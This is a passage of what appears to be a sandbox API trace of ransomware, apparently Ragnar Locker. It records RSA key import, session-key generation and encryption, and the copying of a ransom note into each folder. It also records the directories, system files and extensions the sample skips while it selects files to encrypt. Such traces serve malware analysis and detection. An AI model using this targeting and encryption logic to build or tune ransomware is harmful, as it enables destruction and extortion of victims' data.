KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35948f0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35948f0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0169.883] GetProcessHeap () returned 0x3520000 [0169.883] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35409f8 | out: hHeap=0x3520000) returned 1 [0169.883] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35948f0, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0169.883] CryptImportPublicKeyInfo (in: hCryptProv=0x3556550, dwCertEncodingType=0x1, pInfo=0x357fc90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x357fcc0*, PublicKey.cbData=0x10e, PublicKey.pbData=0x357fcc8*, PublicKey.cUnusedBits=0x0), phKey=0x3586884 | out: phKey=0x3586884*=0x3548100) returned 1 [0169.883] GetProcessHeap () returned 0x3520000 [0169.883] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35948f0 | out: hHeap=0x3520000) returned 1 [0169.883] LocalFree (hMem=0x357fc90) returned 0x0 [0169.883] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x35564c8) returned 1 [0169.884] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0169.884] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0169.884] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0169.887] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35562a8) returned 1 [0169.888] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0169.888] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0169.888] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0169.891] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35565d8) returned 1 [0169.996] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0169.996] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0169.996] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0170.000] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556b28) returned 1 [0170.000] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0170.000] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0170.000] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0170.004] CryptEncrypt (in: hKey=0x3548100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0170.005] GetLastError () returned 0x80090016 [0170.005] CryptEncrypt (in: hKey=0x3548100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0170.006] GetLastError () returned 0x80090016 [0170.006] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x6e0) returned 0x3f0 [0170.007] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556330) returned 1 [0170.007] CryptGenRandom (in: hProv=0x3556330, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0170.007] CryptReleaseContext (hProv=0x3556330, dwFlags=0x0) returned 1 [0170.007] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0170.158] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556bb0) returned 1 [0170.159] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0170.159] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0170.159] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0170.162] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556e58) returned 1 [0170.163] CryptGenRandom (in: hProv=0x3556e58, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0170.163] CryptReleaseContext (hProv=0x3556e58, dwFlags=0x0) returned 1 [0170.163] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0170.185] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556990) returned 1 [0170.186] CryptGenRandom (in: hProv=0x3556990, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0170.186] CryptReleaseContext (hProv=0x3556990, dwFlags=0x0) returned 1 [0170.186] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0170.189] CryptEncrypt (in: hKey=0x3548100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0170.190] GetLastError () returned 0x80090016 [0170.190] CryptEncrypt (in: hKey=0x3548100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0170.190] GetLastError () returned 0x80090016 [0170.190] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0xea4) returned 0x3b4 [0170.192] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3f0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0170.498] GetProcessHeap () returned 0x3520000 [0170.498] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586880 | out: hHeap=0x3520000) returned 1 [0170.498] CloseHandle (hObject=0x3f0) returned 1 [0170.498] GetProcessHeap () returned 0x3520000 [0170.498] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0170.500] CloseHandle (hObject=0x3b4) returned 1 [0170.500] GetProcessHeap () returned 0x3520000 [0170.501] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0170.502] FindClose (in: hFindFile=0x3548240 | out: hFindFile=0x3548240) returned 1 [0170.506] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1030", cAlternateFileName="")) returned 1 [0170.506] lstrcmpiW (lpString1="1030", lpString2=".") returned 1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="..") returned 1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="Windows") returned -1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="Windows.old") returned -1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="Tor browser") returned -1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="Internet Explorer") returned -1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="Google") returned -1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="Opera") returned -1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="Opera Software") returned -1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="Mozilla") returned -1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="Mozilla Firefox") returned -1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="$Recycle.Bin") returned 1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="ProgramData") returned -1 [0170.506] lstrcmpiW (lpString1="1030", lpString2="All Users") returned -1 [0170.506] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0170.507] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1030" | out: lpString1="1030") returned="1030" [0170.507] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\" [0170.507] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1030\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\" [0170.507] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\!$R4GN4R_B8CF767A$!.txt" [0170.507] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1030\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0170.515] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*" [0170.515] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0170.515] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0170.515] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0170.515] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3548140 [0170.515] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0170.515] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf2f9a24b, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.517] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0170.517] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0170.517] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2f94156, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf2f94156, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0170.517] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0170.517] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0170.518] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0170.518] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0170.518] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0170.518] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0170.518] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0170.518] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0170.518] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0170.518] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0170.518] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0170.518] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0170.518] FindClose (in: hFindFile=0x3548140 | out: hFindFile=0x3548140) returned 1 [0170.519] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547f40 [0170.520] FindNextFileW (in: hFindFile=0x3547f40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf2f9a24b, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf2f9a24b, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.521] FindNextFileW (in: hFindFile=0x3547f40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2f94156, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf2f94156, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0170.521] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0170.521] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0170.521] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1030\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0170.521] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0170.522] FindNextFileW (in: hFindFile=0x3547f40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0170.522] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0170.522] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0170.522] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf") returned=".rtf" [0170.522] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0170.522] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0170.522] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0170.522] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0170.522] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0170.522] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0170.522] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0170.522] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0170.522] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0170.522] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0170.522] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0170.522] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0170.523] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0170.523] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0170.523] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0170.523] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0170.523] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0170.523] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0170.523] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0170.523] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0170.523] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0170.523] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0170.523] GetProcessHeap () returned 0x3520000 [0170.523] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0170.525] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" [0170.525] FindNextFileW (in: hFindFile=0x3547f40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0170.525] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0170.525] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0170.525] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned=".xml" [0170.525] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0170.525] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0170.525] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0170.525] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0170.525] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0170.525] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0170.525] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0170.525] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0170.525] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0170.527] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0170.527] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0170.527] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0170.527] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0170.527] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0170.527] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0170.527] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0170.527] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0170.527] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0170.527] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0170.527] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0170.527] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0170.527] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0170.527] GetProcessHeap () returned 0x3520000 [0170.527] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0170.529] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" [0170.529] FindNextFileW (in: hFindFile=0x3547f40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0170.529] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1030\\*.*", 